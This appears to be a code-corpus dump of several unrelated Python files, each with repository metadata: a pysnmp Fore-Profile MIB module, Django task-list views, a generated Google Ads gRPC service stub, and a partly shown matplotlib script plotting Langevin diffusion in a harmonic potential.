if mibBuilder.loadTexts: profileServiceMaxPayloadSize.setDescription('This object represents the maximum payload size (bytes) supported by the service. This object corresponds to frPVCEndptInMaxFrameSize and frPVCEndptOutMaxFrameSize in RFC1604.')
profileServiceInBwOb = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 500)).clone(100)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceInBwOb.setStatus('current')
if mibBuilder.loadTexts: profileServiceInBwOb.setDescription('This object represents the bandwidth overbooking (percentage) of the service in the inbound direction. If the percentage is bigger than 100%, it is overbooking; otherwise it is underbooking.')
profileServiceOutBwOb = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 500)).clone(100)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileServiceOutBwOb.setStatus('current')
if mibBuilder.loadTexts: profileServiceOutBwOb.setDescription('This object represents the bandwidth overbooking (percentage) of the service in the outbound direction. If the percentage is bigger than 100%, it is overbooking; otherwise it is underbooking.')
profileServiceRefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 5, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileServiceRefCnt.setStatus('current')
if mibBuilder.loadTexts: profileServiceRefCnt.setDescription('The value of this object identifies the number of services that are currently referring to this profile.')
profileEpdPpdTable = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6), )
if mibBuilder.loadTexts: profileEpdPpdTable.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdTable.setDescription('The EPD/PPD profile table.')
profileEpdPpdEntry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileEpdPpdIndex"))
if mibBuilder.loadTexts: profileEpdPpdEntry.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdEntry.setDescription('An entry in the EPD/PPD profile table.')
profileEpdPpdIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileEpdPpdIndex.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdIndex.setDescription('This object identifies the index of a profile in this table.')
profileEpdPpdRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileEpdPpdRowStatus.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdRowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileEpdPpdName = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 3), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileEpdPpdName.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdName.setDescription('This object specifies the symbolic name assigned to this profile for user reference.')
profileEpdPpdPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("low", 1), ("high", 2))).clone('low')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileEpdPpdPriority.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdPriority.setDescription('This object specifies the EPD/PPD priority queue the connection is assigned.')
profileEpdPpdClp0Epd = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('enabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileEpdPpdClp0Epd.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdClp0Epd.setDescription('This object specifies whether the EPD/PPD controller discards CLP=0 traffic after the Clp0Epd threshold has been hit.')
profileEpdPpdClp1Ppd = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('enabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileEpdPpdClp1Ppd.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdClp1Ppd.setDescription('This object specifies whether the EPD/PPD controller discards CLP=1 traffic after the Clp1Ppd threshold has been hit.')
profileEpdPpdClp1Epd = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2))).clone('enabled')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: profileEpdPpdClp1Epd.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdClp1Epd.setDescription('This object specifies whether the EPD/PPD controller discards CLP=1 traffic after the Clp1Epd threshold has been hit.')
profileEpdPpdRefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 6, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileEpdPpdRefCnt.setStatus('current')
if mibBuilder.loadTexts: profileEpdPpdRefCnt.setDescription('The value of this object identifies the number of connections that are currently referring to this profile.')
profileFrf5Table = MibTable((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7), )
if mibBuilder.loadTexts: profileFrf5Table.setStatus('current')
if mibBuilder.loadTexts: profileFrf5Table.setDescription('The FRF.5 profile table.')
profileFrf5Entry = MibTableRow((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1), ).setIndexNames((0, "Fore-Profile-MIB", "profileFrf5Index"))
if mibBuilder.loadTexts: profileFrf5Entry.setStatus('current')
if mibBuilder.loadTexts: profileFrf5Entry.setDescription('An entry in the FRF.5 profile table.')
profileFrf5Index = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFrf5Index.setStatus('current')
if mibBuilder.loadTexts: profileFrf5Index.setDescription('This object identifies the index of a profile in this table. Indices 1 though 20 are reserved for system defaults')
profileFrf5RowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 2), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5RowStatus.setStatus('current')
if mibBuilder.loadTexts: profileFrf5RowStatus.setDescription('This object is used to create new rows and delete existing rows in this table.')
profileFrf5Name = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5Name.setStatus('current')
if mibBuilder.loadTexts: profileFrf5Name.setDescription('This object specifies the symbolic name assigned to this profile for user reference.')
profileFrf5DeMode = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("mapped", 1), ("ignored", 2))).clone('mapped')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5DeMode.setStatus('current')
if mibBuilder.loadTexts: profileFrf5DeMode.setDescription('If the DE mode is set to mapped, the DE field in the FR_SSCS frame is mapped to the ATM CLP filled of every cell generated by the segmentation process of the AAL5 PDU containing the information of that frame. Otherwise, if the DE mode is set to ignored, the ATM CLP of every ATM cell generated by the segmentation process of the AAL5 PDU containing the information of that frame is set to a constant value specified by the configuration parameter profileFrf5DefaultClp.')
profileFrf5ClpFrsscsDeMode = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("mapped", 1), ("ignored", 2))).clone('mapped')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5ClpFrsscsDeMode.setStatus('current')
if mibBuilder.loadTexts: profileFrf5ClpFrsscsDeMode.setDescription('If the CLP mode is set to mapped, the FR/ATM network interworking function will set the DE field of the Q922 core frame, provided that one or more cells belonging to this frame has its CLP field set, or the DE bit of FR_SSCS frame is set. Otherwise, if the CLP mode is set to ignored, the DE bit of FR_SSCS frame is copied to the Q922 core frame.')
profileFrf5DefaultClp = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5DefaultClp.setStatus('current')
if mibBuilder.loadTexts: profileFrf5DefaultClp.setDescription('This object represents the CLP bit value of all generated ATM cell headers if the DE mode is set to ignored.')
profileFrf5MaxDlcis = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 7), Integer32().clone(5)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5MaxDlcis.setStatus('current')
if mibBuilder.loadTexts: profileFrf5MaxDlcis.setDescription('The maximum number of virtual circuits supported in this VCC.')
profileFrf5MaxPayloadSize = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 8), Integer32().clone(4092)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: profileFrf5MaxPayloadSize.setStatus('current')
if mibBuilder.loadTexts: profileFrf5MaxPayloadSize.setDescription('This object represents the maximum payload size (bytes) supported by the VCC.')
profileFrf5RefCnt = MibTableColumn((1, 3, 6, 1, 4, 1, 326, 1, 16, 4, 7, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: profileFrf5RefCnt.setStatus('current')
if mibBuilder.loadTexts: profileFrf5RefCnt.setDescription('The value of this object identifies the number of connections that are currently referring to this profile.')
mibBuilder.exportSymbols("Fore-Profile-MIB", profileLmiT391=profileLmiT391, profileFuniSigSupport=profileFuniSigSupport, profileLmiN391=profileLmiN391, profileFrf8FecnMode=profileFrf8FecnMode, profileLmiEntry=profileLmiEntry, profileFrRateRefCnt=profileFrRateRefCnt, profileFrf5RefCnt=profileFrf5RefCnt, profileServiceIndex=profileServiceIndex, profileFuniRefCnt=profileFuniRefCnt, profileServiceInBwOb=profileServiceInBwOb, foreProfileModule=foreProfileModule, profileEpdPpdTable=profileEpdPpdTable, profileFrRateInBc=profileFrRateInBc, profileFuniAal34Support=profileFuniAal34Support, profileFrf5Index=profileFrf5Index, profileFuniSigVci=profileFuniSigVci, profileFrf8Protocols=profileFrf8Protocols, profileEpdPpdClp1Epd=profileEpdPpdClp1Epd, profileServiceEntry=profileServiceEntry, profileFuniHdrBytes=profileFuniHdrBytes, profileFrf8Table=profileFrf8Table, profileEpdPpdRowStatus=profileEpdPpdRowStatus, profileEpdPpdIndex=profileEpdPpdIndex, profileFrf5Table=profileFrf5Table, profileFrf5DeMode=profileFrf5DeMode, PYSNMP_MODULE_ID=foreProfileModule, profileFrf5Entry=profileFrf5Entry, profileFuniIlmiVpi=profileFuniIlmiVpi, profileLmiN393=profileLmiN393, profileLmiRole=profileLmiRole, profileFrf5Name=profileFrf5Name, profileFrf8DeMode=profileFrf8DeMode, profileFuniMinVci=profileFuniMinVci, profileServiceAccRate=profileServiceAccRate, profileFrRateInBe=profileFrRateInBe, profileFuniFcsBits=profileFuniFcsBits, profileEpdPpdRefCnt=profileEpdPpdRefCnt, profileServiceTable=profileServiceTable, profileServiceName=profileServiceName, profileFrf8Index=profileFrf8Index, profileFuniIlmiVci=profileFuniIlmiVci, profileLmiRowStatus=profileLmiRowStatus, profileLmiIndex=profileLmiIndex, profileEpdPpdPriority=profileEpdPpdPriority, profileFrRateIndex=profileFrRateIndex, profileServiceMaxVccs=profileServiceMaxVccs, profileFrRateTable=profileFrRateTable, profileLmiRefCnt=profileLmiRefCnt, profileFuniOamSupport=profileFuniOamSupport, profileServiceOutBwOb=profileServiceOutBwOb, profileFrf5DefaultClp=profileFrf5DefaultClp, profileServiceRowStatus=profileServiceRowStatus, profileEpdPpdEntry=profileEpdPpdEntry, profileLmiName=profileLmiName, profileFuniActiveVciBits=profileFuniActiveVciBits, profileLmiN392=profileLmiN392, profileFrf8DefaultDe=profileFrf8DefaultDe, profileEpdPpdClp1Ppd=profileEpdPpdClp1Ppd, profileFrf8RefCnt=profileFrf8RefCnt, profileFrRateOutCir=profileFrRateOutCir, profileFrRateCmPeriod=profileFrRateCmPeriod, profileFuniActiveVpiBits=profileFuniActiveVpiBits, profileLminT3=profileLminT3, profileFrRateOutBc=profileFrRateOutBc, profileFrRateName=profileFrRateName, profileFrf8ClpMode=profileFrf8ClpMode, profileFrf8DefaultClp=profileFrf8DefaultClp, profileFrf5MaxDlcis=profileFrf5MaxDlcis, profileEpdPpdName=profileEpdPpdName, profileFrRateEntry=profileFrRateEntry, profileFrRateOutBe=profileFrRateOutBe, profileFrf5RowStatus=profileFrf5RowStatus, profileFuniMaxVci=profileFuniMaxVci, profileFrf8Entry=profileFrf8Entry, profileLmiT392=profileLmiT392, profileLmiDirection=profileLmiDirection, profileFrRateRowStatus=profileFrRateRowStatus, profileLmiTable=profileLmiTable, profileFrRateMinBc=profileFrRateMinBc, profileServiceRefCnt=profileServiceRefCnt, profileFrf5ClpFrsscsDeMode=profileFrf5ClpFrsscsDeMode, profileFuniName=profileFuniName, profileFuniIlmiSupport=profileFuniIlmiSupport, profileLmiFlavour=profileLmiFlavour, profileFuniSigVpi=profileFuniSigVpi, profileServiceMaxPayloadSize=profileServiceMaxPayloadSize, profileFuniIndex=profileFuniIndex, profileFrRateInCir=profileFrRateInCir, profileFuniConfMode=profileFuniConfMode, profileFuniRowStatus=profileFuniRowStatus, profileFuniEntry=profileFuniEntry, profileFuniTable=profileFuniTable, profileFrf8RowStatus=profileFrf8RowStatus, profileFrf5MaxPayloadSize=profileFrf5MaxPayloadSize, profileFrf8Name=profileFrf8Name, profileEpdPpdClp0Epd=profileEpdPpdClp0Epd)
| [
"[email protected]"
] | |
d8762f137096c890036178284a83d2b8d954379e | cc535054eea53a16756397a017604bc160e35c8e | /tasks/views.py | bed70a9d2c86b9a14133666af5fc63a357f446d8 | [
"MIT"
] | permissive | DevYanB/django-test-ci | 44d1404e9efbd1107393080177d0f08089b45544 | b36cf4138512f9578bfdd81a00d1a719f1148d01 | refs/heads/master | 2022-08-19T10:11:51.448879 | 2020-05-26T06:30:52 | 2020-05-26T06:30:52 | 265,990,666 | 0 | 0 | MIT | 2020-05-22T01:32:19 | 2020-05-22T01:32:19 | null | UTF-8 | Python | false | false | 2,231 | py | """
Task app: Views file
"""
from django.shortcuts import (
render_to_response
)
from django.views.generic import ListView, TemplateView, DetailView
from django.views.generic.edit import CreateView, DeleteView, UpdateView
from django.urls import reverse_lazy
from tasks.models import Task
class TaskList(ListView):
"""
Task list Generic List View
"""
model = Task
ordering = ['-task_created']
def get_context_data(self, **kwargs):
context = super(TaskList, self).get_context_data(**kwargs)
context.update({'nlink': 'list'})
return context
class TaskCreate(CreateView):
"""
Task list Generic Create View
"""
model = Task
fields = ['task_title', 'task_description']
success_url = reverse_lazy('tasks:tasks_list')
def get_context_data(self, **kwargs):
context = super(TaskCreate, self).get_context_data(**kwargs)
context.update({'nlink': 'new'})
return context
class TaskDetails(DetailView):
"""
Task list Detail View
"""
model = Task
fields = ['task_title', 'task_description', 'task_created', 'task_updated']
class TaskUpdate(UpdateView):
"""
Task list Update View
"""
model = Task
fields = ['task_title', 'task_description']
success_url = reverse_lazy('tasks:tasks_list')
def get_context_data(self, **kwargs):
context = super(TaskUpdate, self).get_context_data(**kwargs)
context.update({'nlink': 'update'})
return context
class TaskDelete(DeleteView):
"""
Task list Delete View
"""
model = Task
success_url = reverse_lazy('tasks:tasks_list')
class Custom500(TemplateView):
"""
Task list Custom 500 View
"""
template_name = 'tasks/500.html'
def page_not_found(request, exception):
"""
function to return view http error 404.
"""
response = render_to_response(
'tasks/404.html',
{}
)
response.status_code = 404
return response
def server_error(request):
"""
function to return view http error 500.
"""
response = render_to_response(
'tasks/500.html',
{}
)
response.status_code = 500
return response
| [
"[email protected]"
] | |
8e44e19cb130be2674e367d7430f443fce19e273 | a81c1492783e7cafcaf7da5f0402d2d283b7ce37 | /google/ads/google_ads/v6/proto/services/topic_constant_service_pb2_grpc.py | a88d68b33e4145681b9962007e441f8bbe5a1ed7 | [
"Apache-2.0"
] | permissive | VincentFritzsche/google-ads-python | 6650cf426b34392d1f58fb912cb3fc25b848e766 | 969eff5b6c3cec59d21191fa178cffb6270074c3 | refs/heads/master | 2023-03-19T17:23:26.959021 | 2021-03-18T18:18:38 | 2021-03-18T18:18:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,418 | py | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.ads.google_ads.v6.proto.resources import topic_constant_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_topic__constant__pb2
from google.ads.google_ads.v6.proto.services import topic_constant_service_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_services_dot_topic__constant__service__pb2
class TopicConstantServiceStub(object):
"""Proto file describing the Topic constant service
Service to fetch topic constants.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetTopicConstant = channel.unary_unary(
'/google.ads.googleads.v6.services.TopicConstantService/GetTopicConstant',
request_serializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_topic__constant__service__pb2.GetTopicConstantRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_topic__constant__pb2.TopicConstant.FromString,
)
class TopicConstantServiceServicer(object):
"""Proto file describing the Topic constant service
Service to fetch topic constants.
"""
def GetTopicConstant(self, request, context):
"""Returns the requested topic constant in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_TopicConstantServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetTopicConstant': grpc.unary_unary_rpc_method_handler(
servicer.GetTopicConstant,
request_deserializer=google_dot_ads_dot_googleads_dot_v6_dot_services_dot_topic__constant__service__pb2.GetTopicConstantRequest.FromString,
response_serializer=google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_topic__constant__pb2.TopicConstant.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v6.services.TopicConstantService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class TopicConstantService(object):
"""Proto file describing the Topic constant service
Service to fetch topic constants.
"""
@staticmethod
def GetTopicConstant(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/google.ads.googleads.v6.services.TopicConstantService/GetTopicConstant',
google_dot_ads_dot_googleads_dot_v6_dot_services_dot_topic__constant__service__pb2.GetTopicConstantRequest.SerializeToString,
google_dot_ads_dot_googleads_dot_v6_dot_resources_dot_topic__constant__pb2.TopicConstant.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| [
"[email protected]"
] | |
7dcf96accdcf4db049e9177294638d59a30e4830 | d1496657ee41a5c78ba4e1d5e47b52711194f938 | /Langevin/src/03_analyze_harmonicDiffusion.py | 2f67ae6f77d87d9438e1b0d13b1afbe76ff7b708 | [] | no_license | khx0/diffusionTools | 816aed59485e7dc1fc46bad39cd8e03e3933b2ce | 0f36998bfe04d04a48715c3aff396ef2279ee2f8 | refs/heads/master | 2021-04-27T15:49:22.604995 | 2018-05-28T07:23:01 | 2018-05-28T07:23:01 | 122,477,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,792 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
##########################################################################################
# author: Nikolas Schnellbaecher
# contact: [email protected]
# date: 2018-05-27
# file: 03_analyze_harmonicDiffusion.py
##########################################################################################
import time
import datetime
import sys
import os
import math
import numpy as np
import matplotlib as mpl
from matplotlib import pyplot as plt
from matplotlib import rc
from matplotlib.pyplot import legend
import matplotlib.colors as colors
import matplotlib.cm as cmx
from Langevin import getMoments
def ensure_dir(dir):
if not os.path.exists(dir):
os.makedirs(dir)
now = datetime.datetime.now()
now = "%s-%s-%s" %(now.year, str(now.month).zfill(2), str(now.day).zfill(2))
BASEDIR = os.path.dirname(os.path.abspath(__file__))
RAWDIR = os.path.join(BASEDIR, 'raw')
OUTDIR = os.path.join(BASEDIR, 'out')
ensure_dir(OUTDIR)
def getFigureProps(width, height, lFrac = 0.17, rFrac = 0.9, bFrac = 0.17, tFrac = 0.9):
'''
True size scaling auxiliary function to setup mpl plots with a desired size in cm.
Specify widht and height in cm.
lFrac = left fraction in [0, 1]
rFrac = right fraction in [0, 1]
bFrac = bottom fraction in [0, 1]
tFrac = top fraction in [0, 1]
returns:
fWidth = figure width
fHeight = figure height
These figure width and height values can then be used to create a figure instance
of the desired size, such that the actual plotting canvas has the specified
target width and height, as provided by the input parameters of this function.
'''
axesWidth = width / 2.54 # convert to inches (1 inch = 2.54 cm)
axesHeight = height / 2.54 # convert to inches
fWidth = axesWidth / (rFrac - lFrac)
fHeight = axesHeight / (tFrac - bFrac)
return fWidth, fHeight, lFrac, rFrac, bFrac, tFrac
def Plot(titlestr, X, MSD, outname, outdir, grid = True,
savePDF = True, savePNG = False, datestamp = True):
mpl.rcParams['xtick.top'] = False
mpl.rcParams['xtick.bottom'] = True
mpl.rcParams['ytick.right'] = False
mpl.rcParams['xtick.direction'] = 'out'
mpl.rcParams['ytick.direction'] = 'out'
mpl.rc('font',**{'size': 10})
mpl.rc('legend',**{'fontsize': 5.5})
mpl.rc("axes", linewidth = 0.5)
plt.rc('font', **{'family' : 'sans-serif', 'sans-serif' : ['Helvetica']})
plt.rcParams['pdf.fonttype'] = 42
mpl.rcParams['text.usetex'] = False
mpl.rcParams['mathtext.fontset'] = 'cm'
fontparams = {'text.latex.preamble': [r'\usepackage{cmbright}', r'\usepackage{amsmath}']}
mpl.rcParams.update(fontparams)
######################################################################################
# set up figure
fWidth, fHeight, lFrac, rFrac, bFrac, tFrac =\
getFigureProps(width = 5.5, height = 4.0,
lFrac = 0.16, rFrac = 0.95, bFrac = 0.17, tFrac = 0.92)
f, ax1 = plt.subplots(1)
f.set_size_inches(fWidth, fHeight)
f.subplots_adjust(left = lFrac, right = rFrac)
f.subplots_adjust(bottom = bFrac, top = tFrac)
######################################################################################
major_x_ticks = np.arange(-4.0, 4.1, 2.0)
minor_x_ticks = np.arange(-4.0, 4.1, 1.0)
ax1.set_xticks(major_x_ticks)
ax1.set_xticks(minor_x_ticks, minor = True)
major_y_ticks = np.arange(0.0, 1.05, 0.2)
minor_y_ticks = np.arange(0.0, 1.05, 0.1)
ax1.set_yticks(major_y_ticks)
ax1.set_yticks(minor_y_ticks, minor = True)
labelfontsize = 8.0
for tick in ax1.xaxis.get_major_ticks():
tick.label.set_fontsize(labelfontsize)
for tick in ax1.yaxis.get_major_ticks():
tick.label.set_fontsize(labelfontsize)
xticks = plt.getp(plt.gca(), 'xticklines')
yticks = plt.getp(plt.gca(), 'yticklines')
ax1.tick_params('both', length = 2.5, width = 0.5, which = 'major', pad = 2.0)
ax1.tick_params('both', length = 1.75, width = 0.35, which = 'minor', pad = 2.0)
######################################################################################
# labeling
plt.title(titlestr)
ax1.set_xlabel(r'position $x$', fontsize = 8.0)
ax1.set_ylabel(r'$p(x,t\, |\, x_0,t_0)$', fontsize = 8.0)
ax1.xaxis.labelpad = 2.0
ax1.yaxis.labelpad = 5.0
######################################################################################
# cmap settings
sampleTimes = [0.5, 1.0, 3.0, 5.0, 10.0]
ColorMap = cmx.viridis
cNorm = mpl.colors.LogNorm(vmin = sampleTimes[0], vmax = 12.2)
scalarMap = cmx.ScalarMappable(norm = cNorm, cmap = ColorMap)
print "Colormap colornorm limits =", scalarMap.get_clim()
######################################################################################
# plotting
nSamples = len(sampleTimes)
xVals = np.linspace(-6.0, 6.0, 2000)
labels = [r'$t = 0.5$',
r'$t = 1$',
r'$t = 3$',
r'$t = 5$',
r'$t = 10$']
for i in range(nSamples):
RGBcolorValue = scalarMap.to_rgba(sampleTimes[i])
ax1.plot(xVals, FPE_drift(xVals, x0 = x0Value, t = sampleTimes[i]),
color = RGBcolorValue,
lw = 1.0)
counts, bins = np.histogram(X[i, :], bins = 30, normed = True)
binCenters = [0.5 * (bins[k] + bins[k+1]) for k in range(len(counts))]
binWidth = bins[1] - bins[0]
ax1.scatter(binCenters, counts,
s = 10.0,
marker = 'o',
facecolors = 'None',
edgecolors = RGBcolorValue,
linewidth = 0.65,
label = labels[i],
zorder = 3)
ax1.plot([x0Value, x0Value], [-0.2, 1.0],
lw = 0.5,
color = '#CCCCCC',
alpha = 1.0,
dashes = [6.0, 3.0],
zorder = 1)
######################################################################################
######################################################################################
# dummy plot
handles = []
p, = ax1.plot([-999.0],[-999.0],
lw = 1.25,
color = 'k')
handles.append(p)
labels = [r'FPE (analytical)']
Dleg = plt.legend(handles,
labels,
fontsize = 5.5,
loc = 'upper left',
bbox_to_anchor = [0.0, 1.11],
handlelength = 2.0)
Dleg.draw_frame(False)
plt.gca().add_artist(Dleg)
for k, spine in ax1.spines.items(): #ax.spines is a dictionary
spine.set_zorder(10)
######################################################################################
######################################################################################
######################################################################################
# figure legend
leg = ax1.legend(loc = 'upper right',
handlelength = 1.0,
scatterpoints = 1,
markerscale = 1.5,
ncol = 1)
for i, legobj in enumerate(leg.legendHandles):
legobj.set_linewidth(1.0)
leg.draw_frame(False)
######################################################################################
# set plot range
ax1.set_xlim(-4.2, 4.2)
ax1.set_ylim(-0.015, 0.63)
######################################################################################
# grid options
if (grid):
ax1.grid(color = 'gray', alpha = 0.15, lw = 0.3, linestyle = 'dashed', dashes = [4.0, 1.5])
######################################################################################
# inlet (ax2 object) first moments
ax2 = f.add_axes([0.24, 0.40, 0.18, 0.18])
for axis in ['top', 'bottom', 'left', 'right']:
ax2.spines[axis].set_linewidth(0.35)
ax2.tick_params('both', length = 1.5, width = 0.35, which = 'major', pad = 3.0)
ax2.tick_params('both', length = 1.0, width = 0.25, which = 'minor', pad = 3.0)
ax2.tick_params(axis='x', which='major', pad = 1.0)
ax2.tick_params(axis='y', which='major', pad = 1.0, zorder = 10)
labelfontsize = 4.0
for tick in ax2.xaxis.get_major_ticks():
tick.label.set_fontsize(labelfontsize)
for tick in ax2.yaxis.get_major_ticks():
tick.label.set_fontsize(labelfontsize)
major_x_ticks = np.arange(0.0, 15.1, 5.0)
minor_x_ticks = np.arange(0.0, 15.1, 1.0)
ax2.set_xticks(major_x_ticks)
ax2.set_xticks(minor_x_ticks, minor = True)
major_y_ticks = np.arange(0.0, 2.55, 1.0)
minor_y_ticks = np.arange(0.0, 2.55, 0.5)
ax2.set_yticks(major_y_ticks)
ax2.set_yticks(minor_y_ticks, minor = True)
firstMoments = np.mean(X, axis = 1)
ax2.scatter(sampleTimes, firstMoments,
s = 6.0,
marker = 'o',
facecolors = 'None',
edgecolors = 'k',
linewidth = 0.35,
zorder = 3)
xVals = np.linspace(-2.0, 12.0, 1500)
yVals = [x0Value * np.exp(-t) for t in xVals]
ax2.plot(xVals, yVals,
lw = 0.75,
alpha = 1.0,
color = '#666666',
zorder = 1,
label = r'$\langle x \rangle(t) = x_0e^{-t}$')
leg = ax2.legend(bbox_to_anchor = [0.035, 1.02],
loc = 'upper left',
fontsize = 3.75,
handlelength = 1.0,
scatterpoints = 1,
markerscale = 1.5,
ncol = 1)
leg.draw_frame(False)
ax2.set_xlabel(r'time $t$', fontsize = 4.0)
ax2.set_ylabel(r'$\langle x \rangle (t)$', fontsize = 4.0)
ax2.xaxis.labelpad = 1.0
ax2.yaxis.labelpad = 1.0
ax2.set_xlim(-0.5, 11.5)
ax2.set_ylim(-0.22, 2.25)
ax2.grid(color = 'gray', alpha = 0.25, lw = 0.35, linestyle = 'dashed', dashes = [4.0, 3.0])
######################################################################################
# inlet (ax3 object) MSD plot
ax3 = f.add_axes([0.24, 0.66, 0.25, 0.24])
for axis in ['top', 'bottom', 'left', 'right']:
ax3.spines[axis].set_linewidth(0.35)
ax3.tick_params('both', length = 1.5, width = 0.35, which = 'major', pad = 3.0)
ax3.tick_params('both', length = 1.0, width = 0.25, which = 'minor', pad = 3.0)
ax3.tick_params(axis='x', which='major', pad = 1.0)
ax3.tick_params(axis='y', which='major', pad = 1.0, zorder = 10)
labelfontsize = 4.0
for tick in ax3.xaxis.get_major_ticks():
tick.label.set_fontsize(labelfontsize)
for tick in ax3.yaxis.get_major_ticks():
tick.label.set_fontsize(labelfontsize)
major_x_ticks = np.arange(0.0, 15.1, 5.0)
minor_x_ticks = np.arange(0.0, 15.1, 1.0)
ax3.set_xticks(major_x_ticks)
ax3.set_xticks(minor_x_ticks, minor = True)
major_y_ticks = np.arange(0.0, 1.65, 0.5)
minor_y_ticks = np.arange(0.0, 1.65, 0.1)
ax3.set_yticks(major_y_ticks)
ax3.set_yticks(minor_y_ticks, minor = True)
ax3.scatter(sampleTimes, MSD,
s = 6.0,
marker = 'o',
facecolors = 'None',
edgecolors = 'k',
linewidth = 0.35,
zorder = 3)
xVals = np.linspace(0.0001, 12.0, 1500)
yVals = [ (1.0 - np.exp(-2.0 * t)) for t in xVals]
